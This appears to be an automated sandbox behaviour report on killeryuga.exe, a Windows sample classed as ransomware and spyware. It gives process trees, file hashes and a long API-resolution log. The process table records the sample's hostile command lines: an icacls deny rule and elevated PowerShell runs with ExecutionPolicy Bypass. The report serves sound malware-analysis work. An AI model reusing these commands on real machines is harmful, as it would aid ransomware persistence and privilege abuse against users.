ac69e0f6...26b4 | Sequential Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Spyware, Ransomware, Trojan, Dropper, Backdoor

killeryuga.exe

Windows Exe (x86-32)

Created at 2019-03-24T16:35:00

...

Remarks (2/3)

(0x2000008): One or more processes crashed during the analysis. Analysis results may be incomplete.

(0x200000e): The overall sleep time of all monitored processes was truncated from "1 minute, 40 seconds" to "10 seconds" to reveal dormant functionality.

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8e0 Analysis Target High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" -
#3 0x98c Child Process High (Elevated) icacls.exe icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a" /deny *S-1-1-0:(OI)(CI)(DE,DC) #1
#4 0x50c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1] #1
#5 0x99c Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Admin IsNotAutoStart IsNotTask #1
#6 0x9d0 Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsNotAutoStart IsNotTask #5
#7 0x9d8 Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Service 2460 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #5
#8 0x9ec Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" #5
#9 0x9fc Child Process High (Elevated) updatewin2.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe" #5
#10 0xa0c Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" --Admin #8
#11 0xa18 Child Process High (Elevated) updatewin.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe" #5
#12 0xa38 Child Process High (Elevated) 5.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe" #5
#13 0xa4c Child Process High (Elevated) powershell.exe powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned #10
#14 0xb04 Child Process High (Elevated) powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1""' -Verb RunAs}" #10
#16 0x780 Autostart Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart -
#18 0x588 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsAutoStart IsNotTask #16
#19 0x5a4 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1920 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #16
#20 0x7a0 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1416 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #18

Behavior Information - Sequential View

Process #1: killeryuga.exe
848 7
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:22, Reason: Analysis Target
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:32
OS Process Information
»
Information Value
PID 0x8e0
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 8E4
0x 8F0
0x 8F4
0x 8F8
0x 8FC
0x 900
0x 904
0x 910
0x 984
0x 988
0x 998
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Marked Writable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00407C6C, 0x004035D8 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x00293F80 0x002D2EB3 Marked Executable - 32-bit - False
...
buffer 0x00293F80 0x002D2EB3 Content Changed - 32-bit 0x002948AB, 0x00293F80 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE, 0x0040D690, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043EE43 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043F020 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004425A0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043BFE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe 345.50 KB MD5: 55b42589931331c2929847c78d0933d5
SHA1: 904940b9ab5442595f75f6d6dfe46832569bc234
SHA256: ac69e0f6c8a697982a4897607ccd4def633354f6336a68985d48ae78920e26b4
SSDeep: 6144:CcygBt56u4UqjIC6ibJd9mke7R68W55C0aPCUN8VOuMua6oIHCKvFXT:3ygP5bq0C3JKJR68m5C76suMKoIH9XT 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB MD5: 2db89fb48fd886b621627751f2ae15ed
SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066
SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166
SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8 		False
...
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB MD5: 74d69403f4a938faa28298c110bc71c3
SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5
SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9
SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9 		False
...
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB MD5: 5e31bed3dcccef21e35fb4760123ec80
SHA1: 9b71b827ebf51079bc9fc5a16f8e55632420973f
SHA256: 2b20e239286f1c2d4e92d6657cc4476dc410b74553fb57b53f11b5fbd7101466
SSDeep: 192:JBdGeOS2B5KSijSgSaSQSzSASxSXSUS8SRSnSfSfSVSZSKSjwSWASMSYSVSvSvSJ:rdGj5it8TTZ4R5/4 		False
...
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\ietldcache\index.dat 256.00 KB MD5: 6852149628dae385c68c7a9db7028560
SHA1: c6e02c929ec99f984b04876816024c3a39b88ccb
SHA256: 53ae38a5bdbd72f76bf578f6c36e0b54a994003f535dbc1b469c12f3a169e3a4
SSDeep: 384:p8JEJH45Y0z6hKO59HqXRIhHPQ3NGjt3hAJnNH0kHf9QV9wRULzArvCCjgnF5TRy:pTHcEt8jdjFQg2cEbcaaoQARz40LG 		False
...
Threads
Thread 0x8e4
627 7
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x75b14124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x75b1439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
